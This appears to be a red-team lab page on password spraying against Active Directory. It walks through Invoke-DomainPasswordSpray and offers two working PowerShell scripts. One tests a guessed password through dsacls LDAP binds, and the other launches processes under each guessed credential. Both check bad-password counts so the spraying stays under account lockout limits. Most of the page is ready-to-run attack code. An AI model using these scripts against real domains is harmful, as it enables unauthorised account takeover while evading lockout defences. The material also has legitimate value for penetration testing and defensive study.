Active Directory Password Spraying

This lab explores ways of password spraying against Active Directory accounts.
Invoke-DomainSpray
[email protected]
1
Get-ADUser -Properties name -Filter * | Select-Object -ExpandProperty name |  Out-File users.txt
2
type users.txt
Copied!
[email protected]
1
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Copied!
Spraying using dsacls
While I was poking around with dsacls for enumerating AD object permissions
Enumerating AD Object Permissions with dsacls
I noticed that one could attempt to bind to LDAP using specific AD credentials, so a dirty AD password spraying POC came about:
[email protected]
1
$domain = ((cmd /c set u)[-3] -split "=")[-1]
2
$pdc = ((nltest.exe /dcname:$domain) -split "\\\\")[1]
3
$lockoutBadPwdCount = ((net accounts /domain)[7] -split ":" -replace " ","")[1]
4
$password = "123456"
5
​
6
# (Get-Content users.txt)
7
"krbtgt","spotless" | % {
8
    $badPwdCount = Get-ADObject -SearchBase "cn=$_,cn=users,dc=$domain,dc=local" -Filter * -Properties badpwdcount -Server $pdc | Select-Object -ExpandProperty badpwdcount
9
    if ($badPwdCount -lt $lockoutBadPwdCount - 3) {
10
        $isInvalid = dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:[email protected].local /passwd:$password | select-string -pattern "Invalid Credentials"
11
        if ($isInvalid -match "Invalid") {
12
            Write-Host "[-] Invalid Credentials for $_ : $password" -foreground red
13
        } else {
14
            Write-Host "[+] Working Credentials for $_ : $password" -foreground green
15
        }        
16
    }
17
}
Copied!
Spraying with Start-Process
Similarly to dsacls, it's possible to spray passwords with Start-Process cmdlet and the help of PowerView's cmdlets:
spray-ldap.ps1
1
# will spray only users that currently have 0 bad password attempts
2
# dependency - powerview
3
​
4
function Get-BadPasswordCount {
5
    param(
6
        $username = "username",
7
        $domain = "offense.local"
8
    )
9
    $pdc = (get-netdomain -domain $domain).PdcRoleOwner
10
    $badPwdCount = (Get-NetUser $username -Domain $domain -DomainController $pdc.name).badpwdcount
11
    return $badPwdCount
12
}
13
​
14
$users = Get-netuser -properties samaccountname | Select-Object -ExpandProperty samaccountname
15
$domain = "offense.local"
16
$password = "123456"
17
​
18
Write-Host $users.Count users supplied; $users | % {
19
    $badPasswordCount = Get-BadPasswordCount -username $_ -Domain $domain
20
    if ($badPasswordCount -lt 0) {
21
        Write-Host Spraying : -NoNewline; Write-host -ForegroundColor Green " $_"
22
        $credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @("$domain\$_",(ConvertTo-SecureString -String $password -AsPlainText -Force))
23
        Start-Process cmd -Credential ($credentials)
24
    } else {
25
        Write-Host "Ignoring $_ with $badPasswordCount badPwdCount" -ForegroundColor Red
26
    }
27
}
Copied!
Enjoy the shells:
References
DomainPasswordSpray/DomainPasswordSpray.ps1 at master · dafthack/DomainPasswordSpray
GitHub
PowerSploit/Recon at master · PowerShellMafia/PowerSploit
GitHub
​
​

Enumerating AD Object Permissions with dsacls

Active Directory Lab with Hyper-V and PowerShell

Last modified 2yr ago

Copy link

Contents

Invoke-DomainSpray

Spraying using dsacls

Spraying with Start-Process

References